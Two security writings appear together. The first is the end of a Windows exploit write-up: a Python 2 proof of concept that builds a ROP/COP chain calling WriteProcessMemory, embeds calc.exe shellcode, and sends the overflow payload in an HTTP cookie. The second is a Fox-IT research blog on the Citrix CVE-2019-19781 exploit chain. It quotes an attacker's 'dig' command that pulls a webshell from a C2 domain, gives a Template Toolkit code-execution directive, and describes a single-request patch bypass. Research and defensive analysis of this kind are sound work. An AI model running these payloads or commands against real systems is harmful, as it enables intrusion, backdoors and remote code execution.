# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory is negative 0xfffffd2d bytes away from kernel32!GetStartupInfoA (which is now in EAX, after dereferencing the kernel32!WriteProcessMemory parameter placeholder twice)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After value is in EDX, it will be added to EAX via EDX)

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory from kernel32!GetStartupInfoA

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory parameter placeholder

# Gadget to overwrite kernel32!WriteProcessMemory parameter placeholder will do so at an offset of ECX + 0x8. Compensating for that now
# First, decrementing ECX by 0x8
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# The goal now is to load the address pointing to kernel32!WriteProcessMemory in ESP
# ECX contains an address + 0x8 bytes behind the kernel32!WriteProcessMemory pointer on the stack
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off the ROP chain!
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)


# NOPs before shellcode
crash += "\x90" * 230

# calc.exe
# 195 bytes

crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0")

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
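
The offsets used in the PoC can be sanity-checked in isolation. The following sketch rebuilds only the skeleton of the buffer (padding, a stand-in for the ROP chain and shellcode, the SEH overwrite, and the trailing filler). It uses bytes so that it also runs on Python 3, unlike the Python 2 PoC above. `build_skeleton` and the `body` stand-in are hypothetical and exist only for this illustration.

```python
import struct

PIVOT_LANDING = 2563   # offset where the stack pivot lands
SEH_OFFSET = 4063      # offset of the SEH handler overwrite
TOTAL = 5000           # total length of the crash buffer

def build_skeleton(body):
    """Lay out padding, chain + shellcode, the SEH overwrite, and the filler."""
    buf = b"\x90" * PIVOT_LANDING
    buf += body
    if len(buf) > SEH_OFFSET:
        raise ValueError("ROP chain and shellcode overrun the SEH offset")
    buf += b"\x41" * (SEH_OFFSET - len(buf))
    buf += struct.pack("<L", 0x10022869)   # add esp, 0x1004 ; ret (ImageLoad.dll)
    buf += b"\x41" * (TOTAL - len(buf))
    return buf

# Hypothetical stand-in for the real chain, NOP sled, and shellcode.
skeleton = build_skeleton(b"\xCC" * 200)
print(len(skeleton))
```

The check makes one constraint explicit: everything between the pivot landing point and the SEH overwrite has to fit in 4063 - 2563 = 1500 bytes.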

iF wE dIsAbLe cAlC wE wIlL mItIgAtE aLl tHe zEro dAyS

Conclusion

Had to think outside the box with a few of the COP gadgets, but overall this was very fun! Hopefully this was informative and helped out anyone looking to stay away from VirtualProtect() or VirtualAlloc().

Peace, love, and positivity :-)

A Second Look at CVE-2019-19781 (Citrix NetScaler / ADC)

By: Fox IT
1 July 2020 at 03:50

Authors: Rich Warren of NCC Group FSAS & Yun Zheng Hu of Fox-IT, in close collaboration with Fox-IT’s RIFT.

About the Research and Intelligence Fusion Team (RIFT):

RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

 

In this blog post we will revisit CVE-2019-19781, a Remote Code Execution vulnerability affecting Citrix NetScaler / ADC. We will explore how this issue has been widely abused by various actors and how a hacker turf war led to some actors “adversary patching” the vulnerability in order to prevent secondary compromise by competing adversaries – hiding the true number of vulnerable and compromised devices in the wild.

Following this, we will take a deep-dive into the vulnerability itself and present a previously unpublished technique which can be used to exploit CVE-2019-19781, without any vulnerable Perl file – bypassing the “adversary patching” techniques used by some attackers.

We will also provide statistics on exploitation, patching and backdoors we have identified in the wild.

Public Exploitation & Backdoors

Back in January 2020, shortly before the first public exploits for CVE-2019-19781 were released, Fox-IT built and deployed a number of honeypots in order to keep an eye on exploitation attempts by malicious actors. Additionally, we developed our own in-house exploit in order to study and understand the vulnerability, as well as to use it on our Red Team engagements.

On 10th January 2020, the first public exploits were released on GitHub. Shortly after this we started to see a significant uptick in both scanning and exploitation of the vulnerability. Most of the initial exploits weaponised by attackers came in the form of coin-miners, however a number of other “interesting” attacks were also observed within the first few days of exploitation. Typically, these involved a webshell being deployed to the compromised device.

This allowed us to collect a list of backdoors deployed by attackers, and subsequently develop signatures which could be used to identify backdoors as well as specific indicators of compromise. Following this, Fox-IT’s RIFT Team were able to gather statistics around patch adoption and backdoors deployed in the wild.

As an example, the following webshell was observed being dropped as part of a group of backdoors which we refer to as the “Iran Network Team” backdoors, first described in our Reddit live blog on January 13th 2020. It is important to note that although this particular actor used a C2 domain of cmd.irannetworkteam.org we have not made any attribution to Iran or any other state actor. At the time however, this particular attacker stood out as distinct from many other attackers, who appeared to be focused on deploying coin-miners.

Instead, this attacker appeared to be concerned with gaining remote persistent access to as many systems as possible, deploying a number of PHP webshells using the Project Zero India public exploit. These webshells would be deployed by issuing a “dig” command such as the following:

exec('dig cmd.irannetworkteam.org txt|tee /var/vpn/themes/login.php | tee /netscaler/portal/templates/REDACTED.xml');

This would fetch the webshell content via a TXT record hosted on the C2 domain, the content of which would be written to the following PHP file:

  • /var/vpn/themes/login.php

Variants were also observed, using the “logout.php” file instead, as well as staging payloads via Base64 encoded files named “readme.txt” and “read.txt”.
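
As a rough triage aid, the file names mentioned above can be searched for on a live or mounted filesystem. This is a sketch only: the function name and the `root` parameter are hypothetical, the text does not say where the “readme.txt” and “read.txt” staging files were written (so the whole tree under `root` is walked), and a hit is a lead for investigation rather than proof of compromise.

```python
import os

# File names taken from the description above. Whether any of them can also
# exist legitimately on a given firmware build is an assumption to verify.
SUSPICIOUS_NAMES = {"login.php", "logout.php", "readme.txt", "read.txt"}

def find_candidate_artifacts(root):
    """Return sorted paths under `root` whose file name matches a known artifact name."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name in SUSPICIOUS_NAMES:
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)

if __name__ == "__main__":
    for path in find_candidate_artifacts("/var/vpn/themes"):
        print(path)
```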

This PHP file was in fact a simple webshell, which did not require any authentication in order to interact with it, other than knowing the POST parameter name. According to our statistics, this attacker was largely successful in deploying their backdoor to a significant number of systems, many of which, although patched, are left vulnerable due to the password-less backdoor left open on their devices. This backdoor could be used not only by the original attacker, but also by any script-kiddie or state actor with knowledge of the webshell path and POST parameter name.

As well as backdoors, we were also able to identify specific exploitation artifacts. For example, when studying the “Iran Network Team” attacks, we noticed that the attacker would commonly stage secondary payloads within the public directory of the server, meaning that their presence could be easily detected.

Once the signatures for each backdoor variant were developed, analysis of the available data was carried out. This initially included 5 different known backdoors and artifacts and was done using data from late January 2020. This provided some interesting results, some of which are detailed below.

In January 2020 a total of 1030 compromised servers were identified. The majority of these compromised devices were situated in the US, with a total of 2057 backdoors and artifacts being identified. Many of these compromised devices belonged to Governmental organizations and Fortune 500 companies. There appeared to be no specific sector that was targeted more than any other; however, backdoors were observed on high-profile organisations from a number of industries including manufacturing, media, telecoms, healthcare, financial and technology.

 

Backdoors – Count by Country

However, of perhaps more concern was that, of these compromised devices, 54% had been patched against CVE-2019-19781, thus providing their administrators with a false sense of security. This is because although the devices were indeed patched, any backdoor installed by an attacker prior to this would not have been removed by simply installing the vendor’s patch.

Note that the Unknown hosts recorded below are hosts that did not respond with an expected HTTP response (e.g. a 403 or a 200).

Backdoored Servers – Patch Status

From Malware to Palware

Following the initial discovery of public exploitation of this vulnerability, the team at FireEye released their analysis of a new backdoor, named “NOTROBIN”, written in Golang. What was different about this backdoor, however, was that instead of deploying a coin-miner or a simple webshell, NOTROBIN would actually attempt to identify and remove any backdoors that had been installed prior to it, as well as attempt to block further exploitation by deleting new XML files or scripts that did not contain a per-infection secret key.

This marked a shift, at least for one actor, to a new type of infection, which DCSO eloquently described as “palware” – a seemingly innocent piece of malware with the primary goal of preventing other actors from deploying their own malware.

But was the actor behind NOTROBIN the only one to deploy this “palware” method? Possibly not. A number of anecdotal cases, as well as our own first-hand experience suggest that other attackers have also carried out “adversary patching” by deleting the vulnerable Perl scripts (such as newbm.pl) from compromised devices, thus preventing other attackers from exploiting the same issue, whilst maintaining access for themselves.

Whether this is in fact a separate actor, or actually a quirk of NOTROBIN’s backdoor removal function, is not so clear. As mentioned earlier, one of the features of NOTROBIN’s backdoor removal function (aptly named remove_bds) is to remove any file within the /netscaler/portal/scripts/ directory which has been recently modified and does not contain NOTROBIN’s secret key within either the filename or the contents. Of course this would include any backdoor that had been dropped by a previous attacker; however, if one of the built-in scripts such as newbm.pl had been modified, perhaps as the result of a backdoor being added, this would also result in the removal of that file by NOTROBIN. This means not only that the backdoor would be removed, but also that the entire script, and all its legitimate functionality, would be wiped out with it.
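
The selection rule described here can be paraphrased in a few lines. This is not NOTROBIN’s code; it is a hypothetical Python paraphrase of the behaviour described above. The 14-day window standing in for “recently modified” and the function name are assumptions. The function only lists candidates and deletes nothing.

```python
import os
import time

def files_remove_bds_would_target(scripts_dir, secret_key, max_age_days=14, now=None):
    """List files modified within the window that lack the key in both name and contents."""
    now = time.time() if now is None else now
    cutoff = now - max_age_days * 86400   # assumed meaning of "recently modified"
    targets = []
    for name in sorted(os.listdir(scripts_dir)):
        path = os.path.join(scripts_dir, name)
        if not os.path.isfile(path):
            continue
        if os.path.getmtime(path) < cutoff:
            continue                      # not recently modified: left alone
        if secret_key in name:
            continue                      # key in the file name: left alone
        with open(path, "rb") as handle:
            if secret_key.encode() in handle.read():
                continue                  # key in the contents: left alone
        targets.append(path)
    return targets
```

A stock script such as newbm.pl that an earlier attacker had modified would land in this list as well, which matches the side effect described above.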

We have also responded to incidents where the “vulnerable” Perl files such as newbm.pl have been renamed to contain the NOTROBIN key, e.g.:

/netscaler/portal/scripts/<key>_newbm.pl

This effectively makes the vulnerability exploitable only by an actor with prior knowledge of the infection key.

As a result, there are hosts which on the surface appear to be patched, but which have in fact been compromised by a previous attacker who removed or renamed the “vulnerable” Perl files.

During the remainder of this blog post, we will discuss the inner workings of the Citrix vulnerability and exploit. We will then demonstrate a new exploitation technique which would allow an attacker to bypass both NOTROBIN’s patching method, as well as enable exploitation of a device that has had the vulnerable Perl scripts removed.

Vulnerability Deep Dive

Before we get into the details of bypassing the “adversary patch”, we will spend some time refreshing ourselves with what the vulnerability was, and how it is exploited.

TL;DR Version

Essentially, exploitation of this issue can be broken down into two steps which we will discuss in detail later. A short summary is given below:

  • Step 1: An HTTP request is made to a “vulnerable” Perl file. The attacker may or may not need to use directory traversal within the URL in order to access the Perl file, depending on whether the request is being made to a management or virtual IP interface. An HTTP header is supplied containing a directory traversal string to an XML file, which is to be written to disk. Note: A “vulnerable” Perl file is considered to be any Perl file which calls the `UserPrefs::csd` function followed by the `UserPrefs::filewrite` function. This is important, and typical of all public exploits.
  • Step 2: A follow-up HTTP request is then made, causing the crafted XML file to be rendered by the template engine, resulting in arbitrary code-execution.

Of course, we’ve skipped some steps here to simplify things, but the important thing to remember is the following limitations of this exploitation method:

  1. A “vulnerable” Perl file must exist on the system (which is certainly the case by default, however another attacker or a well-meaning administrator may have removed it)
  2. Two HTTP requests are required in order to achieve code execution.

Detailed Exploitation Steps

In order to fully understand the steps detailed above, let’s look at how the vulnerability works in detail, and explain why these steps are necessary. This should help us later to understand how to bypass the limitations.

If you are already familiar with the inner workings of the exploit you can skip over this next section.

For a good background on exploitation of this issue, please check out the MDSec blog post, which explains in great detail the vulnerability and exploitation steps. However for the sake of completeness (and to highlight a few specific things) we will explain it here too.

The CVE-2019-19781 “vulnerability” is in fact the CVE used to record the mitigation steps for a number of vulnerabilities which could be exploited together to achieve unauthenticated remote code execution. Citrix later released a patch to remediate the majority of these vulnerabilities used as part of the exploit chain.

Directory Traversal

The first of the vulnerabilities was a path canonicalisation issue which allowed requests to the Virtual IP (VIP) interface to bypass certain access control measures if the request contained a directory traversal string. This essentially allowed an unauthenticated user to invoke Perl scripts which were not intended to be exposed via the public interface. This included Perl scripts within the /vpns/portal/scripts/ directory, thus exposing any underlying vulnerabilities which might exist within the Perl scripts contained in this directory.

So, now the attacker is able to access certain Perl scripts within the “scripts” directory. However, another vulnerability is needed to turn that unintended access into arbitrary file write, and eventual code execution.

Controlled File Write

The next issue, a partially controlled file-write, existed within the UserPrefs.pm module, specifically within the csd function, which takes the value of the NSC_USER header supplied within the request and sets it as the $username variable. This username value is later used to build the $self->{filename} instance variable without any form of sanitisation.

As shown in the following screenshots, the username value is taken directly from the HTTP header, before being concatenated with some predefined values to form the filename variable.

csd Function

User-controlled Filename
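
To illustrate why the missing sanitisation matters, the following sketch models the filename construction in Python rather than Perl. `BASE_DIR`, `build_filename` and `escapes_base` are hypothetical names, and the base directory is a placeholder rather than the path used on the appliance; only the pattern (fixed prefix, then the header value, then a fixed suffix) is taken from the description above.

```python
import posixpath

BASE_DIR = "/var/example/prefs"  # placeholder, not the real appliance path


def build_filename(username: str) -> str:
    """Concatenate fixed parts around the header value, with no sanitisation."""
    return BASE_DIR + "/" + username + ".xml"


def escapes_base(username: str) -> bool:
    """Return True if the resulting path resolves outside BASE_DIR."""
    resolved = posixpath.normpath(build_filename(username))
    return not resolved.startswith(BASE_DIR + "/")


print(build_filename("alice"))
print(escapes_base("alice"))
print(escapes_base("../../../tmp/demo"))
```

A check along the lines of `escapes_base`, or simply rejecting any value containing a path separator, is the sort of validation that the csd function lacked.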

However, this alone does not lead to an exploitable condition. All it does is set a variable. We need to cause this value to be used for something useful. Given the name of the filename variable, we can make a pretty good guess at what it’s used for, and lo and behold there is indeed a function named filewrite, also contained within the UserPrefs.pm module.

filewrite Function

This function takes the username value, and again uses it to build a path to write out an XML file to the filesystem (note that it reconstructs the path from username again). The contents of this file are controlled via the $doc variable, which depending on when it is called, contains various user-controlled data.

So filewrite can be tricked into writing an XML file to an arbitrary location via a directory traversal in the HTTP header, but how do we trigger a call to filewrite, and how do we control the contents?

Well, as UserPrefs is a Perl module we cannot simply execute it directly via the URL traversal. Instead we need to find and invoke a Perl script, which makes use of the vulnerable functionality. For that we need to find a Perl file which:

  1. Is invokable as an unauthenticated user (i.e. contained in the `/vpns/portal/scripts` directory)
  2. Calls both `csd` and `filewrite` from the `UserPrefs.pm` module

As discussed in many blog posts and tweets, as well as used in a number of public exploits, the newbm.pl script fits this requirement.

First it instantiates a UserPrefs object (called $user), before calling the csd function on the $user object (remember, this allows us to control the filename via the NSC_USER header). It subsequently accepts some data provided by the user in the request, including the url, title and desc parameters. These parameters are set as instance variables of the $doc object and passed to the filewrite function, where the data is serialised to an XML file on disk. This means that we can now control the path of where the XML file is written, as well as some limited content, via the url, title or desc parameters.

Call to csd function:

Call to csd Function

User supplied data added to $newBM variable:

User-controlled Values

User controlled properties assigned to $doc before calling filewrite:

Values Passed to filewrite Function

Now we have a semi-controlled file-write where we can write an XML file anywhere on disk and control some of the content, however we need a way to leverage this to achieve code execution. This is where the Template Toolkit component comes into play.

Perl Code Execution

When a request is received by the Citrix server, the request is handled according to the Apache httpd.conf configuration, which contains a large number of complex redirect rules which ship off the request to a particular component depending on the request properties, such as the request path. Requests to the /vpns/portal/ path are handled by the Handler.pm Perl module via the PerlResponseHandler mod_perl directive in the httpd.conf file.

httpd.conf

Among other things (which we will explain later, or maybe some eagle-eyed readers may spot it in the screenshot), the Handler module simply takes the path specified within the request, forms a path to the requested file, and renders it via the Template Toolkit template engine.

Handler Function

This means that if we write our XML file to the templates directory, and inject template directives via the url, title or desc parameters, we can later cause the XML file to be rendered as a template using a follow-up HTTP request. Perfect!

However, there is one last hurdle. Although the Template Toolkit can allow code execution via template directives such as PERL and RAWPERL, these are disabled in the configuration used on the Citrix server. However, it was discovered that this same functionality could be achieved by abusing the global template object, which is exposed to all templates, to create a new BLOCK containing arbitrary Perl code, via a call to the template.new method. This allows the attacker to execute their code using a template directive such as the following:

[% template.new({ 'BLOCK' => 'print STDERR "ace.\n"; die' }) %]

Further details regarding this “feature” can be found in the GitHub issue.

Note that @0x09AL also identified another method to execute code via the DATAFILE plugin. This is also explained in the MDSec blog post.

Exploit Summary

So putting it all together, we need to:

  1. Make a request to the `.pl` file (e.g. `newbm.pl`) with a directory traversal within the `NSC_USER` header, causing an XML file to be written to the templates directory.
  2. Inject a template directive into the dropped XML file, containing Perl code to be executed
  3. Make another request to the `/vpns/portal/<file>.xml` file in order to cause Handler.pm to render it via the template engine.

The above steps are the same as those carried out in the “Project Zero India” public exploit, as well as the one released by TrustedSec shortly afterwards. It was also the same technique we and others had used in our own exploits. This resulted in some people (us included) believing that the following constraints could be relied upon for detection:

  1. The attacker must make two requests. First a POST request to write the XML file. Second, a GET request to render the XML file.
  2. The first request would be to the `newbm.pl` file
  3. The first request would contain an `NSC_USER` header containing a traversal string
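
These three assumptions can be written down as a simple matching rule. The sketch below is in Python, with a hypothetical `matches_naive_rule` helper operating on an already-parsed request; it is not taken from any published detection script, and the header values are illustrative placeholders.

```python
def matches_naive_rule(method: str, path: str, headers: dict) -> bool:
    """Flag only the first request of the original two-step exploit."""
    # HTTP header names are case-insensitive, so normalise them first.
    normalised = {name.lower(): value for name, value in headers.items()}
    nsc_user = normalised.get("nsc_user", "")
    return (
        method == "POST"
        and path.split("?", 1)[0].endswith("/newbm.pl")
        and "../" in nsc_user
    )


original = ("POST", "/vpns/portal/scripts/newbm.pl",
            {"NSC_USER": "../../../example/demo"})
variant = ("GET", "/vpns/portal/scripts/picktheme.pl",
           {"NSC_USER": "../../../example/demo"})

print(matches_naive_rule(*original))
print(matches_naive_rule(*variant))
```

The second request differs only in its method and script name, yet the rule does not flag it, which is the weakness explored in the next section.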

Flawed Assumptions

Two days after the public exploits were released, @mpgn_x64 discovered that in fact any Perl file which called the csd function could be exploited, regardless of whether user-provided data was added to the written XML file.

@mpgn_x64 Tweet
Example using picktheme.pl (Step 1)
Example using picktheme.pl (Step 2)

This is possible because when the csd function is called, it eventually calls filewrite if the file does not already exist. This can be seen within the UserPrefs.pm file. When csd is called, it internally calls fileread on line 61:

Call to fileread Function

The fileread function checks if the specified file (constructed via $username value, taken from the NSC_USER header), exists or not.

User-controlled Values in fileread

If the file does not exist, then the initdoc function is called, which creates the XML file passing the $username value:

initdoc Function

Additionally, aside from the user-controlled values (such as url, title, and desc used in newbm.pl), the filewrite function also writes the username within the XML file, which, as we showed before, is controlled via the NSC_USER header. So, if we request a “vulnerable” .pl file with an NSC_USER value that contains both the target XML file to be written and a template injection string, we can exploit the issue without controlling any other values in the XML file!
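
The call chain can be modelled in a few lines. The sketch below is Python, not the Perl from UserPrefs.pm: the function names mirror those in the text, but the bodies, the in-memory `fs` dictionary, the `BASE` prefix and the XML layout are all invented for illustration.

```python
fs = {}            # in-memory stand-in for the filesystem
BASE = "/prefs/"   # hypothetical prefix, not the real path


def filename_for(username):
    return BASE + username + ".xml"


def filewrite(username, doc):
    fs[filename_for(username)] = doc


def initdoc(username):
    # The username ends up inside the document that is written out.
    filewrite(username, '<user username="' + username + '"></user>')


def fileread(username):
    # A missing file triggers creation via initdoc.
    if filename_for(username) not in fs:
        initdoc(username)
    return fs[filename_for(username)]


def csd(username):
    # Calling csd alone is enough to reach filewrite for a new user.
    return fileread(username)


csd("new-user")
print(fs)
```

Because the header value feeds both the file name and the file contents in this model, a single supplied string influences where the file lands and what it contains, which is the property described above.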

After this we simply need to request the XML file, causing it to be rendered via the template engine, ensuring that we encode any non-URL safe characters within the template/path appropriately.

This dispelled the first myth – exploitation could in fact take place against any .pl file calling the csd function. This included the following files:

  • newbm.pl
  • rmbm.pl
  • themes.pl
  • picktheme.pl
  • navthemes.pl
  • personalbookmark.pl

Exploitation of this Method in the Wild

Shortly after this information was published, we started to see the first usage of this new exploitation technique deployed in the wild. This log extract shows some hits that were received in our Citrix honeypots, mostly from TOR exit nodes, starting from January 24th. Interestingly, these requests would write out a Perl backdoor line by line to a file named /netscaler/portal/scripts/loadcolourprefs.pl. This backdoor simply checked if the MD5 hash of the supplied password parameter matched a hardcoded value, and if so, would execute the command provided within the HTTP request.

The decoded webshell code is shown below. This appears to be a modified version of the PerlKit webshell.

https://gist.github.com/rxwx/c51264441107c5159324080c920a96d8.js

The details of this webshell were shared with our contacts at FireEye, who added detection to their IOC scanner script. Later the same month, further attacks were observed in the wild, distributing the same backdoor in what appeared to be large-scale, non-targeted attacks. Just like with the Iran Network Team attacks, we are unable to provide any specific attribution due to limited visibility of post-exploitation activity.

Some more Quirks

To compound matters further, @superevr discovered that due to the way that the Citrix HTTP server handles requests, the exploit does not require a POST request followed by a GET request, and could be carried out with varying request methods. In fact the request method itself did not matter at all, and the issue could be exploited even with a non-existent request method. The HTTP version number itself could also be meddled with, further frustrating efforts to detect exploitation attempts. Thanks to efforts by both the community and FireEye, detection methods were improved to account for these “quirks”.

Refining the Exploit Further

Now we know that exploitation of this issue was not confined to one specific “vulnerable” .pl file, and that attackers are constantly evolving their techniques to overcome our assumptions about the constraints of exploiting a specific vulnerability, such as “how a well-behaving HTTP server should work”. What other assumptions can we challenge? Well, in the next section we will show how we discovered that the issue can in fact be exploited:

  • With only a single HTTP Request
  • Without any “vulnerable” Perl file existing on the server
  • With only non-Perl files (e.g. ping.html)
  • Without any existing file at all

In fact, this method can be used to exploit a vulnerable server even if an attacker has deleted all of the Perl files contained within the “scripts” directory – thus bypassing any “palware” patch that involves removing the vulnerable Perl scripts from the server. And best of all, the “exploit” fits in fewer than 280 characters.

To explain how this works, we need to take a step back and remember how the newbm.pl (and similar) exploits worked. You will recall that they all rely on the csd and filewrite functions being called, hence the need for a “vulnerable” .pl file. However, the csd function is also called outside of these Perl files.

If we take a look again at the Handler.pm module we can see that the csd function is actually called automatically whenever the Handler is invoked, which includes any time a file is served via the /portal/templates/* path. This means that whenever a request is made for a file within the templates directory (via a request to /vpns/portal/<file> which maps via the httpd.conf to the templates directory), the vulnerable code-path will be hit automatically, even if the requested file is an HTML or XML file, for example. The following screenshot highlights where the csd function is called within Handler.pm:

Handler.pm

As demonstrated by @mpgn_x64, all that is required for the exploit to succeed is a single call to the csd function (which itself calls filewrite), where we place both a template injection and directory traversal within the NSC_USER header. Therefore, putting this together, we can hit the vulnerable code without using any of the built-in Perl scripts. Requesting an existing file such as /vpns/portal/ping.html with a crafted NSC_USER header is enough to cause the XML file to be written to disk. An example request is shown below:

Dropping XML Payload with ping.html

